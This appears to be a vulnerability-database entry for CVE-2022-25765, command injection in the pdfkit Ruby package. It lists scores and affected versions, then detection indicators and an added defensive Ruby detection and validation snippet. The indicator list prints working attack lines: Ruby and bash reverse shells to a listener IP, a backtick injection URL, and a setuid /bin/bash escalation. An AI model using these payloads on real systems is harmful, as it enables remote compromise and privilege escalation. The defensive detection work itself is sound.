CVE-2022-25765
published 2022-09-09

CVE-2022-25765: The package pdfkit from 0.0.0 is vulnerable to Command Injection where the URL is not properly sanitized.

Priority: P2 75 · Severity: critical · CVSS 3.1 base score: 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 38.92% (98.4th percentile)

Affected (6 ranges)

Vendor           Product   Version range             Fixed in
fedoraproject    fedora
fedoraproject    fedora
fedoraproject    fedora
pdfkit_project   pdfkit    >= 0 < 0.8.7.2            0.8.7.2
pdfkit_project   pdfkit    >= 0.0.0 < unspecified    unspecified
pdfkit_project   pdfkit    >= 0.0.0

Detection & IOCs (extracted from sources)

command:  http://%20`{command}`
command:  http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{listenIP}","{listenPort}"))'`
command:  http://10.10.14.12:8000/?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/10.10.14.12/443
command:  bash -c 'exec bash -i &>/dev/tcp/10.10.14.12/443
command:  sudo /usr/bin/ruby /opt/update_dependencies.rb
command:  chmod u+s /bin/bash
path:     /opt/update_dependencies.rb
filename: dependencies.yml
version:  pdfkit 0.8.7.2

• The vulnerability affects all pdfkit versions from 0.0.0 through 0.8.7.2; the exploit was specifically tested on pdfkit 0.8.6, so detection rules should cover the full version range.
• The default POST parameter targeted by the exploit is `url`; applications may use different parameter names, requiring tunable detection rules.
• The injection requires the URL to contain a space encoded as `%20` immediately before the backtick-wrapped command; URL-decoding must be applied before pattern matching in WAF/IDS rules.
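As an added illustration of the three detection notes above (this is not code from the cvebase record or from the pdfkit project), the Ruby below URL-decodes a request parameter before matching, keeps the list of inspected parameter names tunable, and shows the input guard an application can apply before handing a URL to pdfkit. The parameter names other than `url`, the `fully_decode`/`suspicious_pdfkit_url?`/`safe_for_pdfkit?`/`flag_request_params` helpers and the sample request are all constructed for this example.

```ruby
require 'uri'
require 'cgi'

# Parameter names to inspect. `url` is the default the exploit targets;
# the other two are assumed application-specific names (constructed here).
INSPECTED_PARAMS = %w[url source_url document_url].freeze

# Decode repeatedly, with a bound, so double encoding (%2520 -> %20 -> space)
# cannot hide the "%20`" sequence from the rule.
def fully_decode(value, max_rounds = 3)
  decoded = value.to_s
  max_rounds.times do
    nxt = CGI.unescape(decoded)
    break if nxt == decoded
    decoded = nxt
  end
  decoded
end

# Detection rule: after decoding, whitespace followed by a backtick-wrapped
# or $( )-wrapped command is the shape used against pdfkit's URL argument.
INJECTION_PATTERN = /\s+(`[^`]*`|\$\([^)]*\))/

def suspicious_pdfkit_url?(raw_value)
  fully_decode(raw_value).match?(INJECTION_PATTERN)
end

# Application-side guard before handing a URL to pdfkit: it must decode to an
# http(s) URL with a host and contain no whitespace, backtick or $( at all.
# This complements, not replaces, upgrading to a fixed pdfkit release.
def safe_for_pdfkit?(raw_value)
  decoded = fully_decode(raw_value)
  return false if decoded.match?(/[\s`]|\$\(/)
  uri = URI.parse(decoded)
  %w[http https].include?(uri.scheme) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false
end

# Given a request's parameter hash, return the names whose values look hostile.
def flag_request_params(params)
  params.select { |name, value| INSPECTED_PARAMS.include?(name) && suspicious_pdfkit_url?(value) }.keys
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample request, shaped like the `%20`-before-backtick IoC above.
  sample = { 'url' => 'http://%20`id`', 'name' => 'report' }
  puts "flagged: #{flag_request_params(sample).inspect}"   # flagged: ["url"]
end
```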